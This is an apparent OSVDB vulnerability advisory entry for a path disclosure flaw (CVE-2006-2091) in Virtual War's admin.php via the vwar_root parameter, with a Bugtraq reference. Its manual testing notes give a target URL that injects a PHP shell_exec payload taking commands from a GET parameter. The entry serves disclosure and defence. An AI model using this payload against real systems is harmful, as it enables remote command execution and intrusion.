Virtual War (Vwar) admin.php vwar_root Variable Path Disclosure

2006-04-23T06:06:25
ID OSVDB:25244
Type osvdb
Reporter OSVDB
Modified 2006-04-23T06:06:25

Description

Manual Testing Notes

http://[target]/[path]/[adminpath]/admin.php?vwar_root=%3C?shell_exec($_GET[cmd]);?%3E

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0504.html CVE-2006-2091